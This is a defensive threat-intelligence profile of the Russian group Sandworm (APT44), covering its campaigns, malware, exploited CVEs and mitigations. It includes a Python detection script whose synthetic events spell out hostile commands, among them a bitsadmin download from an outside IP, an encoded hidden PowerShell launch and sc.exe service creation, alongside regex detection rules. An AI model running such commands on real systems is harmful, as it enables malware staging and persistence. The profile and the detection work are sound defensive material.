active threat profile
type Nation-State / APT
threat_level Critical
status Active
origin Russia (GRU)
last_updated 2026-03-13

Sandworm (APT44)

also known as: APT44, Seashell Blizzard, IRIDIUM, Voodoo Bear, FROZENBARENTS, Iron Viking, TeleBots, ELECTRUM, Blue Echidna

Russia's preeminent cyber sabotage unit, operated by GRU Military Unit 74455 (Main Center for Special Technologies). Active since at least 2009, Sandworm is responsible for some of the most destructive and costly cyberattacks in history, including the 2015 and 2016 Ukraine power grid blackouts, the 2017 NotPetya global wiper attack, and the 2018 Olympic Destroyer operation. The group conducts the full spectrum of espionage, sabotage, and influence operations in support of Kremlin strategic objectives.

attributed origin Russia — GRU Unit 74455
state sponsor Russian Federation (Military Intelligence)
first observed ~2009
primary motivation Sabotage / Espionage / Disruption
primary targets Energy, Government, ICS/SCADA, Telecom, Military, Transportation
notable operations 10+ major confirmed
mitre att&ck group G0034
target regions Ukraine, Europe, North America, Middle East, Asia-Pacific
threat level Critical

Overview

Sandworm is an advanced persistent threat group operated by Military Unit 74455 of Russia's Main Intelligence Directorate (GRU), also known as the Main Center for Special Technologies (GTsST). The group's name originates from references to Frank Herbert's Dune found in early malware samples. In April 2024, Mandiant formally graduated the group to the APT44 designation, reflecting its sustained global threat posture and operational maturity.

Unlike other Russian state-backed cyber groups that specialize in a single mission, Sandworm stands apart for having developed and integrated capabilities across espionage, destructive attacks, and information operations into a unified operational playbook. Mandiant describes APT44 as a characteristic representation of Russia's "information confrontation" concept that underpins its modern cyber forces. The group is assessed with high confidence to be the Kremlin's primary cyber attack unit, both within the GRU and across the Russian government.

In October 2020, a U.S. federal grand jury indicted six GRU officers associated with Unit 74455 for their roles in a series of global cyberattacks: Yuriy Andrienko, Sergey Detistov, Pavel Frolov, Anatoliy Kovalev, Artem Ochichenko, and Petr Pliskin. The U.S. Department of State has offered a reward of up to $10 million for information leading to their identification or location. The indictment described Sandworm's campaigns as representing some of the most destructive and costly cyber operations in history.

Critical: Sandworm remains highly active in 2025-2026. ESET investigated more than 10 incidents involving Sandworm-attributed destructive malware in 2025 alone, with targets across Ukraine and a significant cross-border operation against Poland's energy sector in December 2025. Amazon Threat Intelligence also identified sustained Sandworm campaigns targeting Western critical infrastructure through compromised edge devices throughout 2025, including energy utilities, defense, and managed security service providers.

Organizational Structure

Sandworm operates from a facility known as "the Tower" in the Moscow suburb of Khimki. The group is subordinated to the GRU's Information Operation Troops (VIO) and functions as a flexible instrument of Russian state power. Microsoft's research has identified a dedicated initial-access subgroup within Sandworm, responsible for the multi-year BadPilot campaign. Active since at least 2021, this subgroup conducts opportunistic, globally-scaled compromises of internet-facing infrastructure to provide Sandworm with persistent footholds on high-value targets. Since early 2024, BadPilot operations have expanded to targets in the United States, United Kingdom, Canada, and Australia.

The group's operational approach has evolved throughout Russia's war in Ukraine. While early wartime operations focused heavily on destructive cyber sabotage coordinated with kinetic military strikes, Mandiant observed a shift in the second year of the war toward intelligence collection intended to provide battlefield advantage to conventional Russian forces, including exfiltrating communications from captured mobile devices for targeting data.

Target Profile

Sandworm's targeting directly reflects Kremlin strategic priorities. Ukraine has been the group's primary focus for over a decade, but operations have a global scope wherever Russian national interests intersect.

  • Energy & Utilities: Sandworm has repeatedly attacked power grids and energy infrastructure. The 2015 and 2016 Ukraine blackouts were the first confirmed malware-induced power outages in history. The group deployed Industroyer2 against Ukrainian energy systems in 2022, and its DynoWiper malware was used against a Polish energy company in December 2025. Amazon identified sustained targeting of electric utilities and energy providers through 2025.
  • Government & Military: Ukrainian government agencies, military systems, and defense organizations are consistent targets. The group has also targeted NATO member governments, international bodies like the Organisation for the Prohibition of Chemical Weapons (OPCW), and the Parliament of Georgia.
  • Telecommunications: Attacks on telecom infrastructure support both intelligence collection and disruption objectives. In February 2022, the group deployed AcidRain wiper malware against Viasat's KA-SAT satellite network, disrupting Ukrainian military communications at the onset of Russia's invasion.
  • Transportation & Logistics: Shipping, rail, and logistics companies have been targeted to disrupt supply chains, particularly those supporting Ukraine. The grain sector was specifically targeted in 2025 operations to undermine Ukraine's agricultural economy.
  • Elections & Democratic Institutions: The group interfered in the 2017 French presidential election through hack-and-leak operations targeting Emmanuel Macron's La Republique En Marche! party, and has repeatedly targeted Western electoral systems and NATO member institutions.
  • International Sporting Events: The 2018 Olympic Destroyer attack disrupted IT infrastructure at the PyeongChang Winter Olympics in retaliation for Russia's doping ban, disabling Wi-Fi, ticketing systems, and broadcasting operations during the opening ceremony.

Tactics, Techniques & Procedures

Sandworm employs the full spectrum of offensive cyber capabilities. The group is noted for its living-off-the-land (LOTL) techniques, preference for open-source and criminally-sourced tools over custom implants, high operational security, and custom ICS/SCADA-targeting malware capabilities unmatched by other APT groups.

MITRE ATT&CK techniques observed (ID, technique, description):

  • T1566 Phishing: Spearphishing emails are a core initial access method. Trust-building exchanges often precede payload delivery. Used in campaigns targeting Ukrainian defense workers, French presidential campaigns, and Ukr.net users.
  • T1190 Exploit Public-Facing Application: Exploitation of internet-facing infrastructure including Microsoft Exchange (CVE-2021-34473), Zimbra (CVE-2022-41352), Openfire (CVE-2023-32315), JetBrains TeamCity (CVE-2023-42793), ConnectWise ScreenConnect (CVE-2024-1709), and Fortinet FortiClient EMS (CVE-2023-48788).
  • T1195 Supply Chain Compromise: The 2017 NotPetya attack was delivered through a compromised update to the Ukrainian tax accounting software MeDoc. In 2020, the group was found to have compromised Centreon, a French IT monitoring platform, with access maintained since 2017. The BadPilot subgroup has compromised managed IT service providers to reach downstream clients.
  • T1078 Valid Accounts: Credential replay attacks using harvested victim organization credentials against online services. Amazon Threat Intelligence documented systematic credential harvesting from compromised network edge devices throughout 2025.
  • T1059 Command and Scripting Interpreter: Extensive use of PowerShell, Windows Management Instrumentation (WMI), and native Windows utilities for post-exploitation. The living-off-the-land approach minimizes forensic artifacts.
  • T1021.002 SMB/Windows Admin Shares: NotPetya propagated using the EternalBlue and EternalRomance SMBv1 exploits alongside PsExec and WMI for lateral movement. Custom tools like ITCHYSPARK use SMB connections for wiper deployment.
  • T1505.003 Web Shell: The custom LocalOlive web shell enables C2, file uploads, and command execution on compromised servers. Used extensively by the BadPilot subgroup for persistent access since 2021.
  • T1561 Disk Wipe: Prolific deployment of wiper malware families: BlackEnergy/KillDisk (2015-2016), NotPetya (2017), HermeticWiper, CaddyWiper, WhisperGate, IsaacWiper (2022), AcidRain/AcidPour, ZEROLOT, Sting, ZOV, and DynoWiper (2024-2025).
  • T0831 Manipulation of Control (ICS): Custom ICS malware (Industroyer/CrashOverride, Industroyer2) designed to interface with industrial protocols and manipulate circuit breakers in power substations. Capabilities include a SIPROTEC DoS module and protective relay manipulation.
  • T1572 Protocol Tunneling: Use of tunneling utilities including Chisel and rsockstun routed through actor-controlled infrastructure. The ShadowLink utility leverages Tor hidden services for covert persistent access to compromised systems.
  • T1556 Modify Authentication Process: Modification of Outlook Web Access (OWA) login portals with malicious JavaScript to harvest credentials in real time from legitimate authentication flows.
  • T1036 Masquerading: Olympic Destroyer was designed with extensive false flags to misdirect attribution. NotPetya masqueraded as ransomware while functioning as a pure wiper. Remote management tools (Atera, Splashtop) mimic legitimate administrative software.

Known Campaigns

Confirmed operations attributed to Sandworm by government agencies and intelligence firms.

Ukraine Power Grid Blackout DEC 2015

The first confirmed malware-induced power outage in history. BlackEnergy malware was used to compromise three Ukrainian power distribution companies, leaving approximately 230,000 people without electricity. Spearphishing emails delivered the initial access.

Industroyer / CrashOverride Attack DEC 2016

A second attack on Ukraine's power grid using Industroyer, a modular ICS malware framework designed to directly interface with power grid control systems. Approximately one-fifth of Kyiv lost power for about an hour. The malware was potentially designed to cause physical equipment destruction.

French Presidential Election Interference APR – MAY 2017

Spearphishing campaigns and hack-and-leak operations targeted Emmanuel Macron's En Marche! party prior to the 2017 French presidential election. Leaked emails included phishing infrastructure later linked to the NotPetya attack.

NotPetya Global Wiper Attack JUN 2017

A destructive wiper disguised as ransomware, delivered through a compromised update to the Ukrainian MeDoc tax software. Rapidly spread globally using EternalBlue/EternalRomance exploits and WMI/PsExec lateral movement. Caused an estimated $10+ billion in damages worldwide, crippling Maersk, FedEx/TNT Express, Merck, and hundreds of other organizations. Timed to coincide with Ukraine's Constitution Day.

Olympic Destroyer FEB 2018

Disrupted the opening ceremony of the 2018 PyeongChang Winter Olympics by disabling Wi-Fi connectivity, ticketing systems, and broadcasting operations. The malware included extensive false flags to misdirect attribution toward North Korea and China. Launched in retaliation for Russia's doping ban from the games.

OPCW & Georgia Operations 2018 – 2019

Close-access operations against the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague, coinciding with investigations into Russian chemical weapons use. Concurrent spearphishing and reconnaissance campaigns targeted Georgian government institutions.

Viasat KA-SAT Attack (AcidRain) FEB 2022

Deployed AcidRain wiper malware against Viasat's KA-SAT satellite broadband network on February 24, 2022 — the day Russia's full-scale invasion of Ukraine began. Disrupted Ukrainian military communications and caused collateral damage to satellite broadband users across Europe.

Ukraine Wartime Wiper Campaign 2022 – PRESENT

Sustained campaign deploying over a dozen wiper malware families (HermeticWiper, CaddyWiper, WhisperGate, IsaacWiper, Industroyer2, AcidPour, ZEROLOT, Sting, ZOV) against Ukrainian government, energy, telecom, transportation, logistics, media, and grain sector targets. Operations frequently coordinated with kinetic military strikes.

BadPilot Global Access Campaign 2021 – PRESENT

Multi-year initial access operation by a dedicated Sandworm subgroup, exploiting internet-facing infrastructure at scale to establish persistent footholds across energy, oil and gas, telecom, shipping, arms manufacturing, and government sectors. Expanded from Ukraine and Eastern Europe to the U.S., U.K., Canada, and Australia in 2024. Uses ShadowLink (Tor hidden services), LocalOlive web shells, and RMM tools for persistence.

Poland Power Grid Attack (DynoWiper) DEC 2025

ESET attributed an attempted wiper attack against a Polish energy company to Sandworm with medium confidence. The DynoWiper malware was deployed on December 29, 2025, during peak winter demand. The attack coincided with the 10-year anniversary of the 2015 Ukraine power grid blackout. ESET endpoint protection blocked execution, significantly limiting impact.

Tools & Malware

Sandworm maintains an extensive arsenal of custom malware alongside heavy use of open-source and commercially available tools.

  • BlackEnergy / KillDisk: Early backdoor and wiper combination used in the 2015-2016 Ukraine power grid attacks. BlackEnergy provided persistent access; KillDisk destroyed data and rendered systems inoperable.
  • Industroyer / CrashOverride: Custom ICS malware framework designed to interface with industrial control protocols and manipulate power grid circuit breakers. Includes SIPROTEC DoS module for targeting protective relays.
  • Industroyer2: Updated variant deployed against Ukrainian energy infrastructure in April 2022, simplified and refined for targeted ICS disruption.
  • NotPetya (EternalPetya): Destructive wiper masquerading as ransomware. Used EternalBlue/EternalRomance SMBv1 exploits for propagation. Caused over $10 billion in global damages.
  • Olympic Destroyer: Disruptive malware with extensive false flags designed to confuse attribution. Targeted IT systems at the 2018 Winter Olympics.
  • AcidRain / AcidPour: Wiper families capable of bricking modems, servers, and telecom equipment. AcidRain targeted Viasat satellite modems. AcidPour expanded capabilities to include data exfiltration alongside destruction.
  • ZEROLOT / Sting / ZOV / DynoWiper: Recent wiper families deployed in 2024-2025 campaigns against Ukrainian and Polish targets. DynoWiper shares TTPs with ZOV wiper and overwrites file contents with random data.
  • ARGUEPATCH / AXETERROR / Kapeka: Custom backdoors observed in post-2022 operations. AXETERROR is a Go-based backdoor with C2, file transfer, and remote command capabilities. Kapeka is a novel backdoor identified in Eastern European operations.
  • LocalOlive: Custom web shell enabling C2, file uploads, and command execution. Core tool in the BadPilot campaign for persistent access.
  • ShadowLink: Bespoke utility that configures compromised systems as Tor hidden services for covert persistent access, bypassing traditional network security monitoring.
  • Chisel / rsockstun: Open-source tunneling utilities used for deeper network access through actor-controlled infrastructure.

Indicators of Compromise

Publicly available IOCs from CISA advisories, DOJ indictments, and threat intelligence reports. Due to Sandworm's operational security practices and frequent retooling, IOCs have limited shelf life.

Warning: Sandworm prioritizes operational security and frequently rotates infrastructure and tooling. The group's living-off-the-land techniques and use of open-source tools make signature-based detection unreliable. Behavioral detection and continuous threat hunting are essential. Cross-reference IOCs with live threat intel feeds and the latest ESET, Mandiant, and Microsoft reports.

Known CVEs exploited (BadPilot & other campaigns):

  • CVE-2021-34473 — Microsoft Exchange Server RCE (ProxyShell)
  • CVE-2022-41352 — Zimbra Collaboration Suite RCE
  • CVE-2023-32315 — Openfire Admin Console Authentication Bypass
  • CVE-2023-42793 — JetBrains TeamCity Authentication Bypass
  • CVE-2023-23397 — Microsoft Outlook Privilege Escalation
  • CVE-2024-1709 — ConnectWise ScreenConnect Authentication Bypass
  • CVE-2023-48788 — Fortinet FortiClient EMS SQL Injection
  • CVE-2018-13379 — Fortinet FortiOS SSL VPN Path Traversal
  • CVE-2019-10149 — Exim Mail Server RCE

Malware indicators (2024-2025):

  • Detection name: Win32/KillFiles.NMO (DynoWiper, ESET detection name)
  • Behavior: File overwriting with a random 16-byte buffer on fixed and removable drives, followed by a forced reboot
  • Behavior: Deployment via shared domain directories; separate logic for wiping small vs. large files
  • Persistence: Windows service creation/modification via sc.exe; BITS jobs for stealthy malware deployment; Tor hidden services via ShadowLink

Mitigation & Defense

Recommended defensive measures for organizations within Sandworm's target profile, based on CISA, Microsoft, Mandiant, and ESET guidance.

  • Prioritize ICS/OT security: Organizations operating industrial control systems should implement network segmentation between IT and OT environments, deploy ICS-aware monitoring solutions, and maintain visibility into industrial protocol traffic. Sandworm has demonstrated unique capabilities to interact directly with power grid control protocols.
  • Patch internet-facing infrastructure immediately: The BadPilot campaign exploits known vulnerabilities in Exchange, Zimbra, Openfire, TeamCity, ConnectWise ScreenConnect, and Fortinet products. Maintain aggressive patching cadence for all edge and remote access infrastructure.
  • Secure network edge devices: Amazon Threat Intelligence identified Sandworm targeting misconfigured customer network edge devices as a primary initial access vector through 2025. Audit configuration of routers, firewalls, and VPN appliances. Monitor for credential replay attacks against organizational authentication endpoints.
  • Implement offline, air-gapped backups: Sandworm's primary objective is often data destruction. Maintain multiple backup copies stored offline and physically separated from production networks. Test restoration procedures regularly against wiper scenarios.
  • Deploy behavioral detection for living-off-the-land techniques: Sandworm minimizes use of custom malware in favor of native Windows tools, open-source utilities, and commercially available RMM software. Signature-based detection is insufficient. Monitor for anomalous use of PowerShell, WMI, PsExec, sc.exe, BITS, and RMM tools like Atera and Splashtop.
  • Monitor for Tor-based persistence: Detect ShadowLink activity by monitoring for unexpected Tor client installations, hidden service configurations, and anomalous outbound connections to Tor entry nodes on compromised systems.
  • Hunt for web shell indicators: Regularly scan web-facing servers for LocalOlive and other web shells. Monitor for unexpected file creation in web-accessible directories and anomalous web server process behavior.
  • Protect supply chain and managed service providers: Sandworm has compromised IT monitoring platforms and managed service providers to access downstream clients. Evaluate supply chain risk, enforce least-privilege access for third-party vendors, and monitor for anomalous activity originating from trusted service provider connections.
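
The living-off-the-land and Tor-persistence bullets above can be expressed as a small behavioral rule set run over process-creation telemetry. This is an added example, not code from the original profile or from any of the cited vendors: the events, rule names, regex heuristics and the APPROVED_RMM allowlist are all constructed for illustration and are not vendor signatures.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 shape (Image,
# CommandLine, ParentImage). Synthetic samples for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r'sc.exe create UpdSvc binPath= "C:\ProgramData\upd.exe" start= auto'},
    {"id": 2, "image": r"C:\Windows\System32\bitsadmin.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"bitsadmin /transfer job1 /download http://198.51.100.7/a.bin C:\Users\Public\a.bin"},
    {"id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 4, "image": r"C:\Windows\PSEXESVC.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmd": "PSEXESVC.exe"},
    {"id": 5, "image": r"C:\Users\Public\tor\tor.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": r"tor.exe -f C:\Users\Public\tor\torrc"},
    {"id": 6, "image": r"C:\Program Files\Splashtop\Splashtop Streamer\SRServer.exe",
     "parent": r"C:\Windows\System32\services.exe", "cmd": "SRServer.exe"},
    {"id": 7, "image": r"C:\Windows\System32\sc.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmd": "sc.exe query wuauserv"},  # benign read-only query: must not alert
]

# (name, ATT&CK technique, regex over "image | cmd | parent"). The patterns are
# assumed heuristics for illustration, not vendor signatures.
RULES = [
    ("sc.exe service creation/modification", "T1543.003",
     re.compile(r"(?i)\bsc(?:\.exe)?\s+(?:create|config)\b")),
    ("BITS job used for download", "T1197",
     re.compile(r"(?i)(?:bitsadmin(?:\.exe)?\s+/transfer|start-bitstransfer)")),
    ("Encoded PowerShell command line", "T1059.001",
     re.compile(r"(?i)powershell(?:\.exe)?.*\s-(?:e|ec|enc|encodedcommand)\b")),
    ("PowerShell spawned by the WMI provider host", "T1047",
     re.compile(r"(?i)powershell\.exe \| .* \| .*\\WmiPrvSE\.exe$")),
    ("PsExec service binary executed", "T1569.002", re.compile(r"(?i)\bPSEXESVC\.exe\b")),
    ("Tor client executed (possible ShadowLink staging)", "T1090.003", re.compile(r"(?i)\btor\.exe\b")),
    ("RMM tool outside approved inventory", "T1219", re.compile(r"(?i)\b(?:atera|splashtop)\b")),
]

APPROVED_RMM = set()  # hypothetical allowlist of RMM products the organisation licenses


def detect(events, rules=RULES, approved_rmm=APPROVED_RMM):
    """Return one alert dict per (event, rule) hit; callers decide how to route them."""
    alerts = []
    for ev in events:
        haystack = f'{ev["image"]} | {ev["cmd"]} | {ev["parent"]}'
        for name, technique, pattern in rules:
            m = pattern.search(haystack)
            if not m:
                continue
            if technique == "T1219" and m.group(0).lower() in approved_rmm:
                continue  # RMM rule only fires for products not on the inventory
            alerts.append({"event": ev["id"], "rule": name, "technique": technique})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f'event {a["event"]}: [{a["technique"]}] {a["rule"]}')
```

Event 3 fires two rules at once (encoded PowerShell launched by WmiPrvSE.exe), which is the kind of stacked weak signal that behavioral detection relies on where no malware signature exists.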

Note: Sandworm has a well-documented history of coordinating cyber operations with kinetic military strikes and geopolitical events. Organizations should elevate alert postures during periods of heightened geopolitical tension, major international events, and anniversary dates of prior Sandworm operations. The December 2025 Poland power grid attack coincided with the 10-year anniversary of the 2015 Ukraine blackout.

Sources & Further Reading

Attribution and references used to build this profile.
